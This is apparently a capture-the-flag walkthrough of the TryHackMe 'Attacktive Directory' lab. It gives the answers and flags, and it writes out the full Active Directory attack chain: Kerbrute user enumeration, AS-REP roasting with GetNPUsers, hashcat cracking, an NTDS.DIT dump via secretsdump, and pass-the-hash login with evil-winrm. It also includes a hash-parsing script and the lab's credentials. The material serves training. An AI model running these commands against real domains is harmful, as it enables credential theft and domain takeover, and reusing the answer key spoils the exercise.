Attacktive Directory

What tool will allow us to enumerate port 139/445?

Answer: enum4linux

What is the NetBIOS-Domain Name of the machine?

Answer: THM-AD
Context: Running nmap -A -v -p139,445 10.10.79.210 shows the NetBIOS domain name in the SMB host script output (smb-os-discovery). enum4linux <ip> reports it as well.

What invalid TLD do people commonly use for their Active Directory Domain?

Answer: .local

What command within Kerbrute will allow us to enumerate valid usernames?

Answer: userenum
Context: First install Kerbrute by downloading the kerbrute_linux_amd64 release binary from the GitHub repo here, make it executable with chmod +x, and run ./kerbrute_linux_amd64 -h to list its subcommands (userenum is the one for username enumeration).

What notable account is discovered? (These should jump out at you)

Answer: svc-admin
Context: This one requires some setup, since Kerbrute expects a domain name rather than an IP address. We know from Task 3 that the domain is spookysec.local, so edit the hosts file (/etc/hosts) and add the line <ip> spookysec.local. Once that is done you can run: ./kerbrute_linux_amd64 userenum -d spookysec.local --dc spookysec.local userlist.txt

What is the other notable account discovered? (These should jump out at you)

Answer: backup


Abusing Kerberos

We have two user accounts that we could potentially query a ticket from. Which user account can you query a ticket from with no password?

Answer: svc-admin
Context: You will first need to create a new txt file containing the two notable accounts, svc-admin and backup. Run the script with python3 /opt/impacket/examples/GetNPUsers.py and it will print the parameters it needs; the resulting command looks like the following (replace the txt file and IP with your own). The -no-pass option asks for an AS-REP without pre-authentication, so only an account with "Do not require Kerberos preauthentication" set returns a hash:

python3 /opt/impacket/examples/GetNPUsers.py -no-pass -usersfile yourtxtfile.txt -dc-ip 10.10.xx.xx spookysec.local/

Looking at the Hashcat Examples Wiki page, what type of Kerberos hash did we retrieve from the KDC? (Specify the full name)

Answer: Kerberos 5, etype 23, AS-REP
Context: Look at the prefix of the hash returned by the previous question ($krb5asrep$23$...) and match it against the example hashes in the wiki here.

What mode is the hash?

Answer: 18200
Context: The same wiki row that names the hash type also lists its hash-mode number.

Now crack the hash with the modified password list provided, what is the user accounts password?

Answer: management2005
Context: Store the hash in a txt file and run hashcat -m 18200 hash.txt passwordlist.txt. The cracked password is printed after the hash, separated by a colon (hashcat --show -m 18200 hash.txt prints it again later from the potfile).
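
The three steps above (find which user gives up an AS-REP, identify the hash, build the hashcat command) can be automated by parsing the GetNPUsers.py output. The following is an added example written for this walkthrough, not code from the room or from impacket; the sample output it parses is constructed to mirror the hashcat-format line GetNPUsers.py prints, with placeholder hex values that will not crack.

```python
"""Identify AS-REP roastable users and the hashcat mode from GetNPUsers.py output.

Added example for this walkthrough; it is not part of the room or of impacket.
The sample output below is constructed to mirror the hashcat-format lines
GetNPUsers.py prints; the hex payloads are placeholders and will not crack.
"""
import re

# Constructed GetNPUsers.py output: one user still requires pre-auth (no hash),
# one does not and gets an AS-REP hash back. The hex values are placeholders.
SAMPLE_OUTPUT = """\
[-] User backup doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:0123456789abcdef0123456789abcdef$00112233445566778899aabbccddeeff
"""

# hashcat mode and full name for the Kerberos 5 AS-REP prefix handled here.
# Only etype 23 (RC4-HMAC), the type this room returns, is covered.
HASHCAT_MODES = {
    ("krb5asrep", "23"): (18200, "Kerberos 5, etype 23, AS-REP"),
}

# $krb5asrep$<etype>$<user>@<REALM>:<32 hex checksum>$<hex encrypted data>
ASREP_RE = re.compile(
    r"^\$(?P<kind>krb5asrep)\$(?P<etype>\d+)\$(?P<user>[^@$]+)@(?P<realm>[^:]+):"
    r"(?P<checksum>[0-9a-f]{32})\$(?P<edata>[0-9a-f]+)$"
)


def parse_asrep_lines(output):
    """Return one dict (raw, kind, etype, user, realm, checksum, edata) per hash line."""
    hashes = []
    for line in output.splitlines():
        match = ASREP_RE.match(line.strip())
        if match:
            entry = match.groupdict()
            entry["raw"] = line.strip()
            hashes.append(entry)
    return hashes


def preauth_disabled_users(output):
    """Users that answered with an AS-REP hash, i.e. DONT_REQUIRE_PREAUTH is set."""
    return [h["user"] for h in parse_asrep_lines(output)]


def identify(hash_line):
    """Map one hash line to (hashcat mode, hashcat name), or None if unrecognised."""
    match = ASREP_RE.match(hash_line.strip())
    if not match:
        return None
    return HASHCAT_MODES.get((match["kind"], match["etype"]))


def hashcat_command(hash_line, hash_file="hash.txt", wordlist="passwordlist.txt"):
    """Build the hashcat invocation for a recognised hash line, or None."""
    mode = identify(hash_line)
    if mode is None:
        return None
    return f"hashcat -m {mode[0]} {hash_file} {wordlist}"


if __name__ == "__main__":
    for h in parse_asrep_lines(SAMPLE_OUTPUT):
        print(f"{h['user']}@{h['realm']}: {identify(h['raw'])[1]} -> {hashcat_command(h['raw'])}")
```

Any line that does not match the $krb5asrep$23$ shape (the "doesn't have UF_DONT_REQUIRE_PREAUTH set" notice, or an AS-REP of another etype) is simply skipped, so the script never guesses a wrong hashcat mode.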


Domain Privilege Escalation

What method allowed us to dump NTDS.DIT?

Answer: DRSUAPI
Context: Run secretsdump.py with the backup credentials, python3 secretsdump.py -dc-ip spookysec.local backup:backup251786@spookysec.local, and the first lines of output name the method used ("Using the DRSUAPI method to get NTDS.DIT secrets").

What is the Administrators NTLM hash?

Answer: 0e0363213e37b94221497260b0bcb4fc
Context: Look at the output again. NTDS lines have the form user:rid:lmhash:nthash:::, so on the Administrator:500:... line the fourth field is the NT hash.

What method of attack could allow us to authenticate as the user without the password?

Answer: pass the hash
Context: Google it 🙂 In short, NTLM authentication only needs the NT hash, not the plaintext password, so a dumped hash can be used directly.

Using a tool called Evil-WinRM what option will allow us to use a hash?

Answer: -H (the short option for --hash is the capital -H; lowercase -h prints the help)
Context: Google as well; the README in their GH repo lists all of the options.


Flag Submission

For this one, make sure you have Evil-WinRM installed and log in with the Administrator username and the NT hash from the previous questions. Your command should look like evil-winrm -i [Target_IP] -u Administrator -H [Administrator_Hash]

svc-admin

Answer: TryHackMe{K3rb3r0s_Pr3_4uth}

backup

Answer: TryHackMe{B4ckM3UpSc0tty!}

Administrator

Answer: TryHackMe{4ctiveD1rectoryM4st3r}